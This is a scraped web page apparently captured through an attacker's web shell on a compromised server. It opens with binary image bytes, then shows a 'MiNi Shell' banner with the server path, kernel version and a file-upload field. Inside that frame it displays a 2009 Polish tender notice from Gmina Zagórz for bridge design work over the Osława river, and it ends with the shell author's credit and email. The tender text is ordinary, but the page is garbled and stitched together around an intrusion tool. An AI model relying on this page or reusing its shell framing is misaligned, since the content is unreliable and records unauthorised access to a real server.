JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090123/7974-N-2009.html

<p class="kh_header"><b>Zagórz: Opracowanie dokumentacji technicznej i kosztorysowej na budowę kładki pieszo-jezdnej przez rzekę Osławę w miejscowości Morochów w ciągu drogi gminnej Morochów - Czaszyn, odcinka drogi gminnej Morochów - Czaszyn z włączeniem do drogi powiatowej nr 2229R Prusiek - Niebieszczany - Wysoczany oraz uzyskaniem zezwolenia na realizację inwestycji drogowej.</b><br>
<b>Numer ogłoszenia: 7974 - 2009; data zamieszczenia: 23.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zagórz , ul. 3 Maja 2, 38-540 Zagórz, woj. podkarpackie, tel. 013 4622062, faks 013 4622062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zagorz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji technicznej i kosztorysowej na budowę kładki pieszo-jezdnej przez rzekę Osławę w miejscowości Morochów w ciągu drogi gminnej Morochów - Czaszyn, odcinka drogi gminnej Morochów - Czaszyn z włączeniem do drogi powiatowej nr 2229R Prusiek - Niebieszczany - Wysoczany oraz uzyskaniem zezwolenia na realizację inwestycji drogowej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.	Opis przedmiotu zamówienia
1.  	Zakres opracowań stanowiących przedmiot umowy.
Opis przedmiotu zamówienia zawiera wymagania dotyczące dokumentacji technicznej i kosztorysowej dla stadium koncepcji, projektu budowlanego i projektu wykonawczego dotyczącego zadania inwestycyjnego polegającego na opracowaniu dokumentacji technicznej i kosztorysowej na budowę kładki pieszo-jezdnej przez rzekę Osławę w miejscowości Morochów w ciągu drogi gminnej Morochów - Czaszyn, odcinka drogi gminnej Morochów - Czaszyn z włączeniem do drogi powiatowej nr 2229R Prusiek - Niebieszczany - Wysoczany oraz uzyskaniem zezwolenia na realizację inwestycji drogowej.

W skład zamawianej dokumentacji technicznej i kosztorysowej (przedmiotu zamówienia) wchodzą następujące opracowania projektowe:

1. 1.	mapa do celów projektowych,
Mapa do celów projektowych powinna posiadać aktualną klauzulę właściwego ośrodka geodezyjnego z naniesionymi granicami i numerami działek oraz reperami państwowymi w obrębie inwestycji oraz powinna spełniać wymagania określone w ustawie z 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jedn. Dz. U. z 2005 r., Nr 240, poz. 2027 z późn. zm. Obszar mapy zostanie określony przez Wykonawcę stosownie do potrzeb niniejszego opracowania projektowego.
1. 2.	projekt prac geologicznych i dokumentacja geologiczno-inżynierska,
1. 3.	dokumentacja geodezyjna i kartograficzna,
Wykonawca określi obszar niezbędny dla potrzeb realizacji inwestycji (linie rozgraniczające teren) oraz opracuje dokumentację niezbędną do ewentualnego nabycia niezbędnych terenów (projekty podziałów działek) oraz  pozyskania nieruchomości dla celów czasowego zajęcia na czas budowy.
1. 4.	dokumentacja formalno-prawna,
Wykonawca wykona czynności związane z przygotowaniem do nabycia nieruchomości na cele budowlane oraz pozyskania dla celów czasowego zajęcia na czas budowy oraz przygotuje niezbędną dokumentację formalno-prawną. W zakres dokumentacji wchodzi również przygotowanie operatu szacunkowego przez rzeczoznawcę majątkowego określającego wysokość odszkodowań dla właścicieli nieruchomości.
Koszty nabycia praw do nieruchomości ponosi Zamawiający. 
1. 5.	koncepcja budowy obiektu,
Koncepcję należy opracować w oparciu o wcześniej wykonane opracowania wymienione w pkt 1. 1 do 1. 4. Powinna ona zawierać: część opisową i rysunkową, obliczenia konstrukcyjne obiektu i obliczenia hydrologiczno-hydrauliczne, część kosztorysową, część ekonomiczną oraz środowiskową. Koncepcja powinna być wykonana w dwóch wariantach. Należy dokonać oceny proponowanych rozwiązań oraz kosztów ich realizacji. Koncepcję należy przedłożyć Zamawiającemu do akceptacji oraz dokonania wyboru wariantu w oparciu, o który zostaną opracowane projekty. 
1. 6.	materiały do decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, 
Materiały winny spełniać wymagania ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz.U. Nr 62 poz. 627 z późn. zm.), ustawy o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227) oraz ustawy z dnia 16 kwietnia 2004 r. o ochronie przyrody (Dz.U. Nr 92, poz. 880).
Jeżeli będzie to wymagane, Wykonawca opracuje raport o oddziaływaniu przedsięwzięcia na środowisko spełniający wymagania ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziału społeczeństwa w ochronie środowiska oraz ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227).
Wykonawca uwzględni w przygotowanych dokumentach, iż rzeka Osława jest potencjalnym specjalnym obszarem ochrony siedlisk Natura 2000  Dorzecze Górnego Sanu (Shadow List 2006 - 2008).
1. 7.	materiały projektowe do uzyskania opinii, uzgodnień i pozwoleń wymaganych przepisami prawa, w tym: w szczególności operat wodno-prawny i pozwolenie wodno-prawne,
Zawartość materiałów powinna wynikać z potrzeb związanych z opracowywanym projektem. Powinna zawierać w szczególności:
- 	operat wodno-prawny,
- 	pozwolenie wodno-prawne,
- 	projekt organizacji ruchu,
- 	plan wyrębu,
- 	inne dokumenty i materiały niezbędne do uzyskania o zezwoleniu na realizację inwestycji drogowej, 
- 	materiały do uzgodnienia sieci uzbrojenia terenu.
Kserokopie wszelkich uzyskanych warunków, uzgodnień i opinii należy na bieżąco przekazywać Zamawiającemu, w terminach umożliwiających ewentualne skorzystanie z trybu odwoławczego. Jednocześnie Wykonawca przekaże na bieżąco kserokopie wszystkich wystąpień.
1. 8.	projekt budowlany,
Projekt powinien odpowiadać wymaganiom rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w prawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133).
1. 9.	projekt rozbiórki,
Dla obiektów budowlanych przewidzianych do rozbiórki, dla których wymagane jest uzyskanie pozwolenia na rozbiórkę, należy wykonać projekt rozbiórki zawierający:
- 	zakres robót rozbiórkowych,
- 	sposób zapewnienia bezpieczeństwa ludzi i mienia,
- 	szkic przedstawiający lokalizację obiektów, a gdy będzie to niezbędne szczegółowe rysunki z opisami sposobu wykonania robót rozbiórkowych,
- 	pozwolenia, uzgodnienia lub opinie wymagane przepisami prawa.
1. 10.	projekt wykonawczy,
Projekt wykonawczy powinien zostać opracowany na podstawie projektu budowlanego, będąc jego rozszerzeniem i uszczegółowieniem umożliwiającym jednoznaczne określenie przyszłego procesu wykonawstwa robót budowlanych oraz ich wyceny. W tym zakresie winny się znajdować m. in. następujące opracowania: rysunki wykonawcze, projekt technologii robót, rysunki konstrukcyjne i technologiczne lub wytyczne technologiczne.
Ponadto powinien on zawierać również: projekt stałej organizacji wraz z wymaganymi prawem opiniami i decyzją zatwierdzającą wydaną przez zarządzającego ruchem, zasady organizacji ruchu na czas budowy, plan bezpieczeństwa i ochrony zdrowia.
Opracowanie winno zawierać również ewentualne opracowania dotyczące obiektów przeznaczonych do czasowego użytkowania na czas budowy.
Kolejnym składnikiem projektu wykonawczego powinna być część przedmiarowo-kosztorysowa zawierająca przedmiary robót i ślepe kosztorysy dla wszystkich branż i robót objętych dokumentacją projektową.
1. 11.	dokumentacja przetargowa,
Opracowanie stanowi część siwz dla przeprowadzenia postępowania o zamówienie publiczne na wykonanie robót budowlanych objętych dokumentacją projektową, a także ich późniejszy odbiór i rozliczenie. W skład dokumentacji wchodzą: Specyfikacje Techniczna Wykonania i Odbioru Robót Budowlanych, Przedmiar Robót i Formularz Cenowy (tabela elementów rozliczeniowych).
Zawartość tych opracowań powinna być zgodna z ustawą pzp. 
1. 12.	kosztorys inwestorski, 
Kosztorys należy opracować na podstawie rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389).
1. 13. 	materiały do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej oraz zezwolenie na realizację inwestycji drogowej,
Wykonawca powinien przygotować wniosek o wydanie decyzji o zezwoleniu na realizację inwestycji drogowej wraz z załącznikami. Wniosek i załączniki powinny spełniać wymogi ustawy z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (tekst jedn. Dz. U. z 2008 r. Nr 193, poz. 1194 z późn. zm.). Wykonawca złoży w/w wniosek w Starostwie Powiatowym w Sanoku oraz uzyska przedmiotową decyzję wraz oświadczeniem o jej ostateczności.

2.	Charakterystyka istniejącego zagospodarowania terenu oraz projektowanej inwestycji.
Obecnie do przeprawy przez rzekę Osławę w ciągu drogi gminnej Morochów - Czaszyn służy bród z płyt drogowych, a dla potrzeb obsługi ruchu pieszego - kładka liniowa o długości 68 m, konstrukcji stalowej i nawierzchni drewnianej. Obiekty te są przewidziane do rozbiórki po wybudowaniu projektowanej kładki pieszo-jezdnej. W części Morochowa położonej za rzeką, zlokalizowanych jest  kilkanaście jednorodzinnych budynków mieszkalnych.
Usytuowanie brodu i kładki przedstawiono na mapie zasadniczej w skali 1: 1000 (załącznik graficzny nr 1) oraz orientacji 1:10000 (załącznik graficzny nr 2).
Orientacyjny zakres opracowania obejmuje:
- 	włączenie drogi gminnej Morochów - Czaszyn do drogi powiatowej nr 2229 R Prusiek - Niebieszczany - Wysoczany,
- 	odcinek drogi gminnej Morochów - Czaszyn od w/w włączenia do kładki pieszo-jezdnej,
- 	kładka pieszo-jezdna,
- 	odcinek drogi gminnej Morochów - Czaszyn położony za kładką pieszo-jezdną (działka nr 329) o długości ok. 650 m do cieku wodnego (działka o nr 353).
Zamierzeniem Zamawiającego jest rozwiązanie problemu dostępności do terenów położonych z drogiej strony rzeki. Ponadto  inwestycja ma zapewnić bezpieczeństwo dla ruchu pieszego.
Podstawowe parametry projektowanej inwestycji:
Obiekt drogowy:
- 	droga gminna Morochów - Czaszyn,
- 	klasa drogi - D.
Obiekt mostowy (kładka pieszo-jezdna):
-	Nośność: 30 ton.
-	Klasa obciążenia: C.
Parametry użytkowe: należy przyjąć odpowiednio do parametrów drogi, uwzględniając potrzebę oddzielenia ruchu pieszego w celu zapewnienia bezpieczeństwa pieszych. Ze względu na planowane nieduże natężenie ruchu drogowego Zamawiający dopuszcza zastosowanie ruchu wahadłowego pojazdów.
Zamawiający jest zainteresowany również rozwiązaniami projektowymi korzystającymi z elementów konstrukcyjnych mostów składanych typu wojskowego lub podobnych, jeżeli przyczynią się one do obniżenia kosztów.

3. Materiały wyjściowe.
Wykonawca jest zobowiązany do:
- 	przeprowadzenia wizji w terenie oraz oględzin i inwentaryzacji istniejących obiektów,
- 	uzyskania wszystkich opinii, uzgodnień, itp. 
- 	uzyskanie wszystkich prawomocnych decyzji administracyjnych, a w szczególności: decyzji o środowiskowych uwarunkowaniach zgody na realizację przedsięwzięcia, pozwolenia wodno-prawnego oraz innych postanowień administracyjnych niezbędnych do uzyskania zezwolenia na realizację inwestycji drogowej.
W oparciu o uzyskane w wyniku tych działań materiały wyjściowe Wykonawca wykona dokumentację techniczną i kosztorysową oraz uzyska zezwolenie na realizację inwestycji drogowej.

4. Forma dokumentacji.
Zamawiający otrzyma 5 egz. dokumentacji oraz 2 szt. płyty CD z zapisem części tekstowej i graficznej.
Szata graficzna oraz układ projektu powinny spełniać wymagania rozporządzenia Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. Nr 120, poz. 1133).
Części opisowe powinny być wykonane w komputerowym edytorze tekstów kompatybilnym z MS Word, natomiast obliczenia ilości robót powinny być wykonane w arkuszu kalkulacyjnym kompatybilnym z MS Excel.

5. Termin wykonania, okres rękojmi oraz inne informacje dotyczące  zamówienia.
5. 1.	Wspólny słownik zamówień (CPV): 71.32.23.00-4 - Usługi projektowania mostów.
5. 2. 	Opis odpowiednich części zamówienia, jeżeli jest dopuszczalne składanie ofert 	częściowych:
	Zamawiający nie dopuszcza składania ofert częściowych.
5. 3. 	Informacja dotycząca możliwości składania ofert wariantowych:
	Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
5. 4.	Informacja o przewidywanych zamówieniach uzupełniających:
	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
5. 5. 	Termin wykonania zamówienia: 
a)	przedstawienie Zamawiającemu koncepcji budowy obiektu do akceptacji - w terminie nie dłuższym niż 6 miesięcy od dnia podpisania umowy,
b)	przekazanie Zamawiającemu kompletnej dokumentacji -  w terminie nie dłuższym niż 12 miesięcy od dnia podpisania umowy.
c)	przekazanie Zamawiającemu zezwolenia na realizację inwestycji drogowej -  w terminie nie dłuższym niż 15 miesięcy od dnia podpisania umowy.
	Wykonawca w ofercie zaproponuje oferowane terminy wykonania, jednak nie mogą one być dłuższe niż wskazane powyżej. Oferty zawierające terminy dłuższe zostaną odrzucone jako nie spełniające wymogów siwz.
5. 6.	Wymagany przez zamawiającego okres rękojmi - zgodnie z zapisem § 11 ust 3 umowy stanowiącej załącznik nr 7 siwz..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.32.23.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 15.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wniesienie wadium nie jest wymagane.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Warunki wymagane od Wykonawców.
1. 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
a) 	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) 	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c) 	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) 	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia,
e) 	spełniają następujące warunki dodatkowe:
ea)	dysponują lub będą dysponować minimum po jednej osobie posiadającej:
-	uprawnienia budowlane do projektowania bez ograniczeń w specjalności mostowej, 
-	uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej. 
eb)	wykonali należycie w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną dokumentację projektową podobną do objętej przedmiotem zamówienia. Za pracę podobną zamawiający uzna kompletną dokumentację budowy lub przebudowy obiektów mostowych o konstrukcji żelbetowej (projekt budowlany i wykonawczy) odpowiadających wartością usługom stanowiącym przedmiot zamówienia.
1. 2.	Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie dokumentów złożonych przez Wykonawcę, na zasadzie SPEŁNIA lub NIE SPEŁNIA..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 2.	Dokumenty wymagane od Wykonawców dla potwierdzenia warunków, jakie muszą spełnić, aby wziąć udział w postępowaniu o udzielenie zamówienia.
2. 1.	Każdy z Wykonawców ma obowiązek złożyć następujące oświadczenia i dokumenty   potwierdzające spełnienie warunków udziału w postępowaniu: 
a)	oświadczenie Wykonawcy, według wzoru, stanowiącego załącznik nr 3 do niniejszej siwz o spełnianiu warunków określonych w art. 22 ust. 1 ustawy pzp;
W przypadku składania oferty wspólnej ww. oświadczenie składa pełnomocnik w imieniu wykonawców składających ofertę wspólną.
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej (jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności), wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku składania oferty wspólnej w/w dokument składa każdy z Wykonawców składających ofertę wspólną.
	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentu, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawione nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Dokument powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c)	wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, według wzoru, stanowiącego załącznik nr 4 do niniejszej siwz,
W przypadku składania oferty wspólnej Wykonawcy składają jeden wspólny wykaz osób, którymi dysponują lub będą dysponować.
d)	pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób i podmiotów, Wykonawca wskazał osoby, którymi będzie dysponował;
e) 	dokumenty stwierdzające, że osoby, o których mowa w ppkt c), posiadają wymagane uprawnienia tj :
-	uprawnienia budowlane do projektowania bez ograniczeń w specjalności mostowej, 
-	uprawnienia budowlane do projektowania bez ograniczeń w specjalności drogowej. 
oraz dokumenty potwierdzające przynależność tych osób do właściwej izby samorządu zawodowego aktualne na dzień składania ofert.
f)	wykaz wykonanych prac podobnych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców według wzoru, stanowiącego załącznik nr 5 do niniejszej siwz oraz dokumenty potwierdzające, że usługi te zostały wykonane należycie (np. referencje).
W przypadku składania oferty wspólnej Wykonawcy składający ofertę wspólną składają jeden wspólny w/w wykaz.
2. 2.	Ponadto Wykonawcy mają dołączyć do oferty następujące dokumenty:
a)	ofertę cenową sporządzoną na formularzu oferty, wg wzoru stanowiącego załącznik nr 1 do siwz (zgodnie z Częścią B pkt 1. siwz); 
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
b)	harmonogram rzeczowo-finansowy, wg wzoru stanowiącego załącznik nr 2 do siwz (zgodnie z Częścią B pkt 1. siwz);
W przypadku składania oferty wspólnej należy złożyć jeden dokument.
c)	odpowiednie pełnomocnictwa;
Pełnomocnictwa są wymagane jedynie wówczas, gdy upoważnienie do podpisania oferty nie wynika z innych dokumentów załączonych przez Wykonawcę (Część B pkt 1. 6 siwz) lub w przypadku składania oferty wspólnej (Część B pkt 3. 1 siwz).
d)	propozycje zlecenia robót podwykonawcom wskazujące część zamówienia, której wykonanie Wykonawca powierzy podwykonawcom według wzoru stanowiącego załącznik nr 6, jeżeli Wykonawca przewiduje udział podwykonawców lub oświadczenie, że wszystkie prace objęte zamówieniem zostaną wykonane samodzielnie, gdy Wykonawca nie przewiduje udziału podwykonawców.
W przypadku składania oferty wspólnej należy złożyć jeden dokument..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Termin wykonania - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zagorz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Zagórz, 38-540 Zagórz, ul. 3 Maja 2.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.02.2009 godzina 10:00, miejsce: Urząd Miasta i Gminy w Zagórzu, ul. 3 Maja 2, 38-540 Zagórz.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com